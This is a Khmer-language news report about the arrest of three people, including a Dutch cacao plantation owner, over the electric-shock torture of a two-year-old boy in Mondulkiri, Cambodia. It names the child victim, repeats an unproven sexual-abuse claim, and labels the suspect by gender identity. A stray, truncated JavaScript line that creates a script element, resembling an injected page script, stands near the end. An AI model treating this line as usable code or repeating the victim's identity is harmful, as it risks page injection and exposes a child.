Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

តាមពិតជនដែលធ្វេីទារុណកម្មលេីក្មេងនេះ សង្ស័យថាបានរំលោភលេីកុមារកំសត់ ផងដែរ

មណ្ឌលគិរី ៖ ក្នុងចំណោមមនុស្សទាំងបីនាក់នោះមានជនជាតិហ៊ូឡង់ម្នាក់ ដែលជាប់ពាក់ព័ន្ធក្នុងករណីធ្វើទារុណកម្មលើក្មេងតូចកាលពីរខែមុននោះនៅខេត្តមណ្ឌលគិរី គឺបន្ទាប់ពីសមត្ថកិច្ចឃាត់ខ្លួនមនុស្សទាំងបីនាក់បាននៅខេត្តកំពង់ចាម កាលពីថ្ងៃទី៦រសៀលម្សិលមិញ។

មនុស្សទាំង០៣នាក់នេះត្រូវបានបញ្ជូនខ្លួនមកស្នងការដ្ឋានគរបាលខេត្តមណ្ឌលគីរីហើយ ដើម្បីសួរនាំរកតម្រុយតាមចាប់ខ្លួនជនជាតិវៀតណាម ដែលជាអ្នកធ្វើទារុណកម្មផ្ទាល់មកលេីក្មេងតូចមួយនេះ។

លោកស្នងការរងនគរបាលខេត្តមណ្ឌលគិរី លោក សូ សុវណ្ណ បានឱ្យដឹងថា ជនសង្ស័យជាជនជាតិ វៀតណាម ដែលបានធ្វើសកម្មភាពប្រើឧបករណ៍ឆក់ទៅលើក្មេងប្រុសនេះ ឈ្មោះ ដុង ថាំងមានមុខរបរជាចុងភៅនៅក្រុមហ៊ុនកាកាវ ស្ថិតក្នុងភូមិពូក្រូច ឃុំស្រែអំពូម ស្រុកពេជ្រាដា ខេត្តមណ្ឌលគិរី បច្ចុប្បន្នសមត្ថកិច្ចនៅមិនទាន់ចាប់ខ្លួន បាននៅឡើយទេ ចំណែកមនុស្សបីនាក់ ដែលសមត្ថកិច្ចឃាត់ខ្លួនបាននេះ សមត្ថកិច្ចនៅមិនទាន់ហ៊ានសន្និដ្ឋានថា អាចជាប់ពាក់ព័ន្ធនឹង ករណីធ្វើទារុណកម្មលើក្មេង ឬយ៉ាងណានោះទេ ដោយសមត្ថកិច្ចកំពុងសួរនាំ ហើយអ្នកទាំង៣នោះ មាន០២នាក់ជាជនជាតិខ្មែរ មុខរបរជាកម្មករចាំចំការកាកាវ និង០១នាក់ទៀតជនជាតិហ៊ូឡង់ ជាម្ចាស់ចំការកាកាវនោះផ្ទាល់តែម្ដង ។

តែបើតាមប្រភពពីកន្លែងកើតហេតុបានឲ្យដឹងថា ជនជាតិវៀតណាមដែលបានធ្វើទារុណកម្មឆក់ទៅ លើក្មេង ប្រុសម្នាក់នេះ គឺមនុស្សភេទទី៣ និងត្រូវជាសង្សាររបស់ម្ចាស់ចំការកាកាវជាជនជាតិហ៊ូឡង់នោះ ហើយក្មេងរងគ្រោះមាន ឈ្មោះថា សូ សៅ អាយុ២ឆ្នាំ មានឪពុកម្ដាយជាកម្មករចាំចំការកាកាវ ឱ្យជនជាតិហ៊ូឡង់ ក្នុងក្រុមហ៊ុនតែមួយ ជាមួយជនសង្ស័យ ជាជនជាតិវៀតណាមរូបនោះ ហើយការធ្វើទារុណលើក្មេងរងគ្រោះ គឺបានប្រព្រឹត្តនៅចំណុចក្នុងក្រុមហ៊ុនកាកាវនោះផ្ទាល់តែម្ដង ដែលស្ថិតនៅភូមិពូក្រូច ឃុំស្រែអំពូម ស្រុកពេជ្រាដា ដោយសូម្បីតែឪពុកម្ដាយក្មេងរងគ្រោះ ក៏ពុំបានដឹងពីរឿងនេះដែរ លុះបែកធ្លាញវីដេអូធ្វើទារុណកម្មនេះលើបណ្ដាញសង្គមហ្វេសបុក ទើបឪពុកម្ដាយក្មេងរងគ្រោះ បានដឹងពីករណីនេះ ៕

លោកបានបញ្ជាក់ទៀត ក្នុងចំណោមជនសង្ស័យបីនាក់ នោះ គឹមាន០២នាក់គឺឥតជាប់ពាក់ពន្ធ័ រីឯម្នាក់ទៀតជាម្ចាស់ក្រុមហ៊ុនចំការកាហ្វេជាជនជាតិហូឡង់ ក្នុងករណីយចេតនាច់ជួយលាក់បាំងជនប្រព្រឹតព្រោះជាសង្សារបស់ខ្លួនចឹងក៏បានលាក់រហូតដល់បែកធ្លាយរូបវីដីអូកកាលពីថ្មីៗនេះតែម្ដង។

លោក ធឿន សូ ជាឪពុកក្មេងរងគ្រោះបានឲ្យដឹងថា មូលហេតុដែលលោកជាឪពុកពុំបានដឹងថា ជនជាតិវៀតណាមរូបនោះ បានធ្វើទារុណកម្មលើកូនដោយសារតែ នៅពេលថ្ងៃលោកតែងចេញទៅការនៅឆ្ងាយពីបរិវេណក្រុមហ៊ុន ហើយទុក កូនប្រុសនៅកន្លែងស្នាក់នៅក្នុងក្រុមហ៊ុនជាមួយគេឯង ហើយជនជាតិវៀតណាមជាភេទទី៣នោះ មើលលើសំបកក្រៅ គឺជាមនុស្សល្អខ្លាំងណាស់ ដោយគេតាំងតែងទិញនំ និងធ្វើចំណីឲ្យក្មេងៗញាំ មិននឹកស្មានថាជាមនុស្សអាក្រក់ដូច្នេះសោះ ។ ហើយក្នុងនាមលោកជាឪពុកក្មេងរងគ្រោះសន្និដ្ឋានថា កូនរបស់លោកគឺត្រូវបានជនសង្ស័យរំលោភទៀតផងតាមរន្ធគូទ ចំណែកជនជាតិវៀតណាមរូបនោះ បានរត់ចេញពីចំការកាលពីល្ងាចម្សិលមិញពេលទទួលបានព័ត៌មានថាខ្លួនជាជនល្មេីស។ដោយ៖ចិន្ដា

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More